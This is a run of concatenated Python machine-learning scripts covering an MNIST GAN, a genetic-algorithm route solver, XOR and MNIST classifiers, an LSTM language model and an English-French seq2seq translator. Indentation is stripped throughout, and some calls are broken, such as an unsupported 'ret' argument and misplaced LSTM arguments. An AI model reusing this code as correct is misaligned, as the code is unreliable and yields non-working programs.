self.G.add(Conv2DTranspose(depth // 8, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 1) (img)
self.G.add(Conv2DTranspose(1, 5, padding="same"))
self.G.add(Activation("sigmoid"))
print("="*50, "Generator", "="*50)
self.G.summary()
return self.G
def discriminator_model(self):
if self.DM:
return self.DM
# optimizer = RMSprop(lr=0.001, decay=6e-8)
optimizer = Adam(0.0002, 0.5)
self.DM = Sequential()
self.DM.add(self.discriminator())
self.DM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.DM
def adversarial_model(self):
if self.AM:
return self.AM
# optimizer = RMSprop(lr=0.001, decay=3e-8)
optimizer = Adam(0.0002, 0.5)
self.AM = Sequential()
self.AM.add(self.generator())
self.AM.add(self.discriminator())
self.AM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.AM
class MNIST:
def __init__(self):
self.img_x = 28
self.img_y = 28
self.img_z = 1
self.steps = 0
self.load_data()
self.create_models()
# used image indices
self._used_indices = set()
def load_data(self):
(self.X_train, self.y_train), (self.X_test, self.y_test) = mnist.load_data()
# reshape to (num_samples, 28, 28 , 1)
self.X_train = np.expand_dims(self.X_train, axis=-1)
self.X_test = np.expand_dims(self.X_test, axis=-1)
def create_models(self):
self.GAN = GAN()
self.discriminator = self.GAN.discriminator_model()
self.adversarial = self.GAN.adversarial_model()
self.generator = self.GAN.generator()
discriminators = glob.glob("discriminator_*.h5")
generators = glob.glob("generator_*.h5")
adversarial = glob.glob("adversarial_*.h5")
if len(discriminators) != 0:
print("[+] Found a discriminator ! Loading weights ...")
self.discriminator.load_weights(discriminators[0])
if len(generators) != 0:
print("[+] Found a generator ! Loading weights ...")
self.generator.load_weights(generators[0])
if len(adversarial) != 0:
print("[+] Found an adversarial model ! Loading weights ...")
self.steps = int(adversarial[0].replace("adversarial_", "").replace(".h5", ""))
self.adversarial.load_weights(adversarial[0])
def get_unique_random(self, batch_size=256):
indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# while in_used_indices:
# indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# self._used_indices |= set(indices)
# if len(self._used_indices) > self.X_train.shape[0] // 2:
# if used indices is more than half of training samples, clear it
# that is to enforce it to train at least more than half of the dataset uniquely
# self._used_indices.clear()
return indices
def train(self, train_steps=2000, batch_size=256, save_interval=0):
noise_input = None
steps = tqdm.tqdm(list(range(self.steps, train_steps)))
fake = np.zeros((batch_size, 1))
real = np.ones((batch_size, 1))
for i in steps:
real_images = self.X_train[self.get_unique_random(batch_size)]
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
noise = np.random.normal(size=(batch_size, 100))
fake_images = self.generator.predict(noise)
# get 256 real images and 256 fake images
d_loss_real = self.discriminator.train_on_batch(real_images, real)
d_loss_fake = self.discriminator.train_on_batch(fake_images, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# X = np.concatenate((real_images, fake_images))
# y = np.zeros((2*batch_size, 1))
# 0 for fake and 1 for real
# y[:batch_size, :] = 1
# shuffle
# shuffle_in_unison(X, y)
# d_loss = self.discriminator.train_on_batch(X, y)
# y = np.ones((batch_size, 1))
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
# fool the adversarial, telling him everything is real
a_loss = self.adversarial.train_on_batch(noise, real)
log_msg = f"[D loss: {d_loss[0]:.6f}, D acc: {d_loss[1]:.6f} | A loss: {a_loss[0]:.6f}, A acc: {a_loss[1]:.6f}]"
steps.set_description(log_msg)
if save_interval > 0:
noise_input = np.random.uniform(low=-1, high=1.0, size=(16, 100))
if (i + 1) % save_interval == 0:
self.plot_images(save2file=True, samples=noise_input.shape[0], noise=noise_input, step=(i+1))
self.discriminator.save(f"discriminator_{i+1}.h5")
self.generator.save(f"generator_{i+1}.h5")
self.adversarial.save(f"adversarial_{i+1}.h5")
def plot_images(self, save2file=False, fake=True, samples=16, noise=None, step=0):
filename = "mnist_fake.png"
if fake:
if noise is None:
noise = np.random.uniform(-1.0, 1.0, size=(samples, 100))
else:
filename = f"mnist_{step}.png"
images = self.generator.predict(noise)
else:
i = np.random.randint(0, self.X_train.shape[0], samples)
images = self.X_train[i]
if noise is None:
filename = "mnist_real.png"
plt.figure(figsize=(10, 10))
for i in range(images.shape[0]):
plt.subplot(4, 4, i+1)
image = images[i]
image = np.reshape(image, (self.img_x, self.img_y))
plt.imshow(image, cmap="gray")
plt.axis("off")
plt.tight_layout()
if save2file:
plt.savefig(filename)
plt.close("all")
else:
plt.show()
# https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison
def shuffle_in_unison(a, b):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
if __name__ == "__main__":
mnist_gan = MNIST()
mnist_gan.train(train_steps=10000, batch_size=256, save_interval=500)
mnist_gan.plot_images(fake=True, save2file=True)
mnist_gan.plot_images(fake=False, save2file=True)
import random
import numpy as np
import pandas as pd
import operator
import matplotlib.pyplot as plt
from threading import Event, Thread
class Individual:
def __init__(self, object):
self.object = object
def update(self, new):
self.object = new
def __repr__(self):
return self.object
def __str__(self):
return self.object
class GeneticAlgorithm:
"""General purpose genetic algorithm implementation"""
def __init__(self, individual, popsize, elite_size, mutation_rate, generations, fitness_func, plot=True, prn=True, animation_func=None):
self.individual = individual
self.popsize = popsize
self.elite_size = elite_size
self.mutation_rate = mutation_rate
self.generations = generations
if not callable(fitness_func):
raise TypeError("fitness_func must be a callable object.")
self.get_fitness = fitness_func
self.plot = plot
self.prn = prn
self.population = self._init_pop()
self.animate = animation_func
def calc(self):
"""Try to find the best individual.
This function returns (initial_individual, final_individual, """
sorted_pop = self.sortpop()
initial_route = self.population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
progress = [ distance ]
if callable(self.animate):
self.plot = True
individual = Individual(initial_route)
stop_animation = Event()
self.animate(individual, progress, stop_animation, plot_conclusion=initial_route)
else:
self.plot = False
if self.prn:
print(f"Initial distance: {distance}")
try:
if self.plot:
for i in range(self.generations):
population = self.next_gen()
sorted_pop = self.sortpop()
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
individual.update(route)
else:
for i in range(self.generations):
population = self.next_gen()
distance = 1 / self.sortpop()[0][1]
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
try:
stop_animation.set()
except NameError:
pass
final_route_index = self.sortpop()[0][0]
final_route = population[final_route_index]
if self.prn:
print("Final route:", final_route)
return initial_route, final_route, distance
def create_population(self):
return random.sample(self.individual, len(self.individual))
def _init_pop(self):
return [ self.create_population() for i in range(self.popsize) ]
def sortpop(self):
"""This function calculates the fitness of each individual in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, self.get_fitness(individual)) for i, individual in enumerate(self.population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(self):
sorted_pop = self.sortpop()
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
df['cum_sum'] = df['Fitness'].cumsum()
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(self.elite_size) ]
for i in range(len(sorted_pop) - self.elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ self.population[index] for index in result ]
def breed(self, parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(self, selection):
pool = random.sample(selection, len(selection))
children = [selection[i] for i in range(self.elite_size)]
children.extend([self.breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - self.elite_size)])
return children
def mutate(self, individual):
individual_length = len(individual)
for swapped in range(individual_length):
if(random.random() < self.mutation_rate):
swap_with = random.randint(0, individual_length-1)
individual[swapped], individual[swap_with] = individual[swap_with], individual[swapped]
return individual
def mutate_population(self, children):
return [ self.mutate(individual) for individual in children ]
def next_gen(self):
selection = self.selection()
children = self.breed_population(selection)
self.population = self.mutate_population(children)
return self.population
from genetic import plt
from genetic import Individual
from threading import Thread
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for i, city in enumerate(route):
if i == 0:
col.text(city.x-5, city.y+5, "Start")
col.scatter(city.x, city.y, s=70, c='g')
else:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
plt.show()
def animate_progress(route, progress, stop_animation, plot_conclusion=None):
def animate():
nonlocal route
_, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
if isinstance(route, Individual):
target = route.object
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for i, city in enumerate(target):
if i == 0:
ax1[0].text(city.x-5, city.y+5, "Start")
ax1[0].scatter(city.x, city.y, s=70, c='g')
else:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in target ], [city.y for city in target], c='r')
ax1[0].plot([target[-1].x, target[0].x], [target[-1].y, target[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
if plot_conclusion:
initial_route = plot_conclusion
plot_routes(initial_route, target)
Thread(target=animate).start()
import matplotlib.pyplot as plt
import random
import numpy as np
import operator
from plots import animate_progress, plot_routes
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
def get_fitness(route):
def get_distance():
distance = 0
for i in range(len(route)):
from_city = route[i]
to_city = route[i+1] if i+1 < len(route) else route[0]
distance += (from_city - to_city)
return distance
return 1 / get_distance()
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
def benchmark(cities):
popsizes = [60, 80, 100, 120, 140]
elite_sizes = [5, 10, 20, 30, 40]
mutation_rates = [0.02, 0.01, 0.005, 0.003, 0.001]
generations = 1200
iterations = len(popsizes) * len(elite_sizes) * len(mutation_rates)
iteration = 0
gens = {}
for popsize in popsizes:
for elite_size in elite_sizes:
for mutation_rate in mutation_rates:
iteration += 1
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, prn=False)
initial_route, final_route, generation = gen.calc(ret=("generation", 755))
if generation == generations:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): could not reach the solution")
else:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): {generation} generations was enough")
if generation != generations:
gens[iteration] = generation
# reversed_gen = {v:k for k, v in gens.items()}
output = sorted(gens.items(), key=operator.itemgetter(1))
for i, gens in output:
print(f"Iteration: {i} generations: {gens}")
# [1] (popsize=60, elite_size=30, mutation_rate=0.001): 235 generations was enough
# [2] (popsize=80, elite_size=20, mutation_rate=0.001): 206 generations was enough
# [3] (popsize=100, elite_size=30, mutation_rate=0.001): 138 generations was enough
# [4] (popsize=120, elite_size=30, mutation_rate=0.002): 117 generations was enough
# [5] (popsize=140, elite_size=20, mutation_rate=0.003): 134 generations was enough
# The notes:
# 1.1 Increasing the mutation rate to higher rate, the curve will be inconsistent and it won't lead us to the optimal distance.
# 1.2 So we need to put it as small as 1% or lower
# 2. Elite size is likely to be about 30% or less of total population
# 3. Generations depends on the other parameters, can be a fixed number, or until we reach the optimal distance.
# 4.
if __name__ == "__main__":
from genetic import GeneticAlgorithm
cities = load_cities()
# cities = generate_cities(50)
# parameters
popsize = 120
elite_size = 30
mutation_rate = 0.1
generations = 400
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, animation_func=animate_progress)
initial_route, final_route, distance = gen.calc()
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import re
import numpy as np
import os
import time
import json
from glob import glob
from PIL import Image
import pickle
import numpy as np
from keras.utils import np_utils
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
np.random.seed(19)
X = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')
y = np.array([[0],[1],[1],[0]]).astype('float32')
y = np_utils.to_categorical(y)
xor = Sequential()
# add required layers
xor.add(Dense(8, input_dim=2))
# hyperbolic tangent function to the first hidden layer ( 8 nodes )
xor.add(Activation("tanh"))
xor.add(Dense(8))
xor.add(Activation("relu"))
# output layer
xor.add(Dense(2))
# sigmoid function to the output layer ( final )
xor.add(Activation("sigmoid"))
# Cross-entropy error function
xor.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
# show the summary of the model
xor.summary()
xor.fit(X, y, epochs=400, verbose=1)
# accuray
score = xor.evaluate(X, y)
print(f"Accuracy: {score[-1]}")
# Checking the predictions
print("\nPredictions:")
print(xor.predict(X))
import torch
import torchvision
from torchvision import transforms, datasets
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
epochs = 3
batch_size = 64
# building the network now
class Net(nn.Module):
def __init__(self):
super().__init__()
# takes 28x28 images
self.fc1 = nn.Linear(28*28, 64)
self.fc2 = nn.Linear(64, 64)
self.fc3 = nn.Linear(64, 64)
self.fc4 = nn.Linear(64, 10)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = self.fc4(x)
return F.log_softmax(x, dim=1)
if __name__ == "__main__":
training_set = datasets.MNIST("", train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
test_set = datasets.MNIST("", train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
# load the dataset
train = torch.utils.data.DataLoader(training_set, batch_size=batch_size, shuffle=True)
test = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False)
# construct the model
net = Net()
# specify the loss and optimizer
loss = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters(), lr=0.001)
# training the model
for epoch in range(epochs):
for data in train:
# data is the batch of data now
# X are the features, y are labels
X, y = data
net.zero_grad() # set gradients to 0 before loss calculation
output = net(X.view(-1, 28*28)) # feed data to the network
loss = F.nll_loss(output, y) # calculating the negative log likelihood
loss.backward() # back propagation
optimizer.step() # attempt to optimize weights to account for loss/gradients
print(loss)
correct = 0
total = 0
with torch.no_grad():
for data in test:
X, y = data
output = net(X.view(-1, 28*28))
for index, i in enumerate(output):
if torch.argmax(i) == y[index]:
correct += 1
total += 1
print("Accuracy:", round(correct / total, 3))
# testing
print(torch.argmax(net(X.view(-1, 28*28))[0]))
plt.imshow(X[0].view(28, 28))
plt.show()
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed
from keras.layers import Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
if bidirectional:
model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(TimeDistributed(Dense(input_dim, activation="softmax")))
return model
from utils import UNK, text_to_sequence, sequence_to_text
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM
from models import rnn_model
from scipy.ndimage.interpolation import shift
import numpy as np
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=6,
inter_op_parallelism_threads=6,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
INPUT_DIM = 50
test_text = ""
test_text += """college or good clerk at university has not pleasant days or used not to have them half a century ago but his position was recognized and the misery was measured can we just make something that is useful for making this happen especially when they are just doing it by"""
encoded = np.expand_dims(np.array(text_to_sequence(test_text)), axis=0)
encoded = encoded.reshape((-1, encoded.shape[0], encoded.shape[1]))
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.load_weights("results/lm_rnn_v2_6400548.3.h5")
# for i in range(10):
# predicted_word_int = model.predict_classes(encoded)[0]
# print(predicted_word_int, end=',')
# word = sequence_to_text(predicted_word_int)
# encoded = shift(encoded, -1, cval=predicted_word_int)
# print(word, end=' ')
print("Fed:")
print(encoded)
print("Result: predict")
print(model.predict(encoded)[0])
print("Result: predict_proba")
print(model.predict_proba(encoded)[0])
print("Result: predict_classes")
print(model.predict_classes(encoded)[0])
print(sequence_to_text(model.predict_classes(encoded)[0]))
print()
from models import rnn_model
from utils import sequence_to_text, text_to_sequence, get_batches, get_data, get_text, vocab
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
import numpy as np
import os
INPUT_DIM = 50
# OUTPUT_DIM = len(vocab)
BATCH_SIZE = 128
# get data
text = get_text("data")
encoded = np.array(text_to_sequence(text))
print(len(encoded))
# X, y = get_data(encoded, INPUT_DIM, 1)
# del text, encoded
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.summary()
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/lm_rnn_v2_{loss:.1f}.h5", verbose=1)
steps_per_epoch = (len(encoded) // 100) // BATCH_SIZE
model.fit_generator(get_batches(encoded, BATCH_SIZE, INPUT_DIM),
epochs=100,
callbacks=[checkpointer],
verbose=1,
steps_per_epoch=steps_per_epoch)
model.save("results/lm_rnn_v2_final.h5")
import numpy as np
import os
import tqdm
import inflect
from string import punctuation, whitespace
from word_forms.word_forms import get_word_forms
p = inflect.engine()
UNK = "<unk>"
vocab = set()
add = vocab.add
# add unk
add(UNK)
with open("data/vocab1.txt") as f:
for line in f:
add(line.strip())
vocab = sorted(vocab)
word2int = {w: i for i, w in enumerate(vocab)}
int2word = {i: w for i, w in enumerate(vocab)}
def update_vocab(word):
global vocab
global word2int
global int2word
vocab.add(word)
next_int = max(int2word) + 1
word2int[word] = next_int
int2word[next_int] = word
def save_vocab(_vocab):
with open("vocab1.txt", "w") as f:
for w in sorted(_vocab):
print(w, file=f)
def text_to_sequence(text):
return [ word2int[word] for word in text.split() ]
def sequence_to_text(seq):
return ' '.join([ int2word[i] for i in seq ])
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
def get_data(arr, n_seq, look_forward):
n_samples = len(arr) // n_seq
X = np.zeros((n_seq, n_samples))
Y = np.zeros((n_seq, n_samples))
for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
x = arr[i:i+n_seq]
y = arr[i+look_forward:i+n_seq+look_forward]
if len(x) != n_seq or len(y) != n_seq:
break
X[:, index] = x
Y[:, index] = y
return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_text(path, files=["carroll-alice.txt", "text.txt", "text8.txt"]):
global vocab
global word2int
global int2word
text = ""
file = files[0]
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file, encoding="utf8") as f:
text += f.read().lower()
punc = set(punctuation)
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
for ws in whitespace:
text = text.replace(ws, " ")
text = text.split()
co = 0
vocab_set = set(vocab)
for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# convert digits to words
# (i.e '7' to 'seven')
if text[i].isdigit():
text[i] = p.number_to_words(text[i])
# compare_nouns
# compare_adjs
# compare_verbs
if text[i] not in vocab_set:
text[i] = UNK
co += 1
# update vocab, intersection of words
print("vocab length:", len(vocab))
vocab = vocab_set & set(text)
print("vocab length after update:", len(vocab))
save_vocab(vocab)
print("Number of unks:", co)
return ' '.join(text)
from train import create_model, get_data, split_data, LSTM_UNITS, np, to_categorical, Tokenizer, pad_sequences, pickle
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def predict_sequence(enc, dec, source, n_steps, docoder_num_tokens):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
target_seq = np.zeros((1, 1, n_steps))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
target_seq = np.zeros((1, 1, n_steps))
target_seq[0, 0] = to_categorical(sampled_token_index, num_classes=n_steps)
return np.array(output)
def logits_to_text(logits, index_to_words):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return ' '.join([index_to_words[prediction] for prediction in logits])
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
X_tk = pickle.load(open("X_tk.pickle", "rb"))
y_tk = pickle.load(open("y_tk.pickle", "rb"))
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
model.load_weights("results/eng_fra_v1_17568.086.h5")
while True:
text = input("> ")
tokenized = np.array(tokenize([text], tokenizer=X_tk)[0])
print(tokenized.shape)
X = pad_sequences(tokenized, maxlen=source_sequence_length, padding="post")
X = X.reshape((1, 1, X.shape[-1]))
print(X.shape)
# X = to_categorical(X, num_classes=len(X_tk.word_index) + 1)
print(X.shape)
sequence = predict_sequence(enc, dec, X, target_sequence_length, source_sequence_length)
result = logits_to_text(sequence, y_tk.index_word)
print(result)
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, LSTM, GRU, Dense, Embedding, Activation, Dropout, Sequential, RepeatVector
from tensorflow.keras.layers import TimeDistributed
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical, plot_model
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
# hyper parameters
BATCH_SIZE = 32
EPOCHS = 10
LSTM_UNITS = 128
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS), input_shape=input_shape[1:])
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS), return_sequences=True)
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def create_model(num_encoder_tokens, num_decoder_tokens, latent_dim):
# define an input sequence
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
# define the encoder output
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
encoder_states = [state_h, state_c]
# encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# set up the decoder now
decoder_inputs = Input(shape=(None, num_decoder_tokens))
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_state_inputs = [decoder_state_input_h, decoder_state_input_c]
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
decoder_states = [state_h, state_c]
decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def get_batches(X, y, X_tk, y_tk, source_sequence_length, target_sequence_length, batch_size=BATCH_SIZE):
# get total number of words in X
num_encoder_tokens = len(X_tk.word_index) + 1
# get max number of words in all sentences in y
num_decoder_tokens = len(y_tk.word_index) + 1
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# redefine batch size
# it may differ (in last batch of dataset)
batch_size = encoder_input_data.shape[0]
# one-hot everything
# decoder_target_data = np.zeros((batch_size, num_decoder_tokens, target_sequence_length), dtype=np.uint8)
# encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens), dtype=np.uint8)
# decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens), dtype=np.uint8)
encoder_data = np.expand_dims(encoder_input_data, axis=1)
decoder_data = np.expand_dims(decoder_input_data, axis=1)
# for i, sequence in enumerate(decoder_input_data):
# for t, word_index in enumerate(sequence):
# # skip the first
# if t > 0:
# decoder_target_data[i, t-1, word_index] = 1
# decoder_data[i, t, word_index] = 1
# for i, sequence in enumerate(encoder_input_data):
# for t, word_index in enumerate(sequence):
# encoder_data[i, t, word_index] = 1
yield ([encoder_data, decoder_data], decoder_input_data)
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
output = f"{output} <eos>"
output_sentence_input = f"<sos> {output}"
X.append(input)
y.append(output)
# tokenize data
X_tk = Tokenizer()
X_tk.fit_on_texts(X)
X = X_tk.texts_to_sequences(X)
y_tk = Tokenizer()
y_tk.fit_on_texts(y)
y = y_tk.texts_to_sequences(y)
# define the max sequence length for X
source_sequence_length = max(len(x) for x in X)
# define the max sequence length for y
target_sequence_length = max(len(y_) for y_ in y)
# padding sequences
X = pad_sequences(X, maxlen=source_sequence_length, padding="post")
y = pad_sequences(y, maxlen=target_sequence_length, padding="post")
return X, y, X_tk, y_tk, source_sequence_length, target_sequence_length
def shuffle_data(X, y):
"""
Shuffles X & y and preserving their pair order
"""
state = np.random.get_state()
np.random.shuffle(X)
np.random.set_state(state)
np.random.shuffle(y)
return X, y
def split_data(X, y, train_split_rate=0.2):
# shuffle first
X, y = shuffle_data(X, y)
training_samples = round(len(X) * train_split_rate)
return X[:training_samples], y[:training_samples], X[training_samples:], y[training_samples:]
if __name__ == "__main__":
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
# save tokenizers
pickle.dump(X_tk, open("X_tk.pickle", "wb"))
pickle.dump(y_tk, open("y_tk.pickle", "wb"))
# shuffle & split data
X_train, y_train, X_test, y_test = split_data(X, y)
# construct the models
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
plot_model(model, to_file="model.png")
plot_model(enc, to_file="enc.png")
plot_model(dec, to_file="dec.png")
model.summary()
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/eng_fra_v1_{val_loss:.3f}.h5", save_best_only=True, verbose=2)
# train the model
